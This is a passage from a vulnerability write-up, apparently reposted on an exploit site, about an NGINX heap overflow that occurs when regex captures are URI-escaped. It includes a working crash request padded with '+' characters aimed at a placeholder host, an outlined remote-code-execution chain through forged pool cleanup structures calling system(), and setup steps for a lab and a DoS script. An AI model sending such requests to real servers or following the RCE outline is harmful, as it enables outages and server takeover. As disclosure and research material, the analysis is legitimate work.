Share
## https://sploitus.com/exploit?id=D5303D8B-E27F-584A-8672-68F16628DB95
// ngx_http_script_copy_capture_len_code

```c
if ((e->is_args || e->quote) && (e->request->quoted_uri || e->request->plus_in_uri))
{
    // is_args=0, condition is false, proceed to else branch
    return cap[n + 1] - cap[n];  // Return the original length (unescaped)
}
```

**Actual copy** (using the main engine `e`, `is_args=1`):
```c
// ngx_http_script_copy_capture_code
if ((e->is_args || e->quote) && (e->request->quoted_uri || e->request->plus_in_uri))
{
    // is_args=1, condition is true, proceed to if branch
    e->pos = (u_char *) ngx_escape_uri(pos, &p[cap[n]),
                    cap[n + 1] - cap[n],
                    NGX_ESCAPE_ARGS);
    // Each escapable character is expanded from 1 byte to 3 bytes!
}
```

### Overflow size

- Assigned buffer size: `raw_size` (original capture length)
- Actual written size: `raw_size + 2 * N` (where N is the number of escapable characters)
- **Overflow amount = 2 * N bytes**

For example, if there are 100 `+` symbols in the URI, the overflow amount would be 200 bytes. ## How it’s exploited

### 1. DoS (Denial of Service)

The simplest way to exploit this vulnerability is to send a request containing a large number of escapable characters, causing the worker process to crash:

```
GET /api/+++++++++++++++++++++++++++++++++++ HTTP/1.1
Host: target.com
```

### 2. RCE (Remote Code Execution)

A complete RCE exploitation chain requires either disabling ASLR or bypassing it:

1. **Heap layout control**: Controlling the heap layout through connection order management in `ngx_pool_t`.
2. **Overflowing cleanup pointers**: Overflowing into adjacent memory pool structures.
3. **Injecting forged cleanup structures**: Injecting forged structures containing `system()` functions via the POST request body.
4. **Triggering execution**: Closing the affected connection and triggering `ngxdestroy_pool` to traverse the cleanup list.

NGINX’s multi-process architecture makes exploitation more reliable—after a worker crashes, the master process will fork a new worker with the same memory layout. ## File descriptions

- `README.md`: This file contains the vulnerability analysis documentation.
- `Dockerfile`: Used to build an exploitable NGINX environment.
- `nginx.conf`: NGINX configuration that triggers the vulnerability.
- `poc_crash.py`: Tool for performing DoS attacks (triggering worker crashes).
- `docker-compose.yml`: Script for quickly setting up the test environment.

## Quick setup

```bash
# 1. Build and start the exploitable NGINX server
docker-compose up -d

# 2. Run the DoS attack tool
python3 poc_crash.py

# 3. Check the NGINX error log to confirm the crash
docker-compose logs nginx
```

## References

- [NGINX Official CHANGES](https://nginx.org/en/CHANGES) – Release announcements
- [DepthFirst Research Report](https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability) – Technical analysis by the original vulnerability discoverer.
- [F5 Security Bulletin K000160932](https://my.f5.com/manage/s/article/K000160932) – Official security bulletin.

## Disclaimer

This material is intended only for security research and educational purposes. Do not use this information for unauthorized attacks.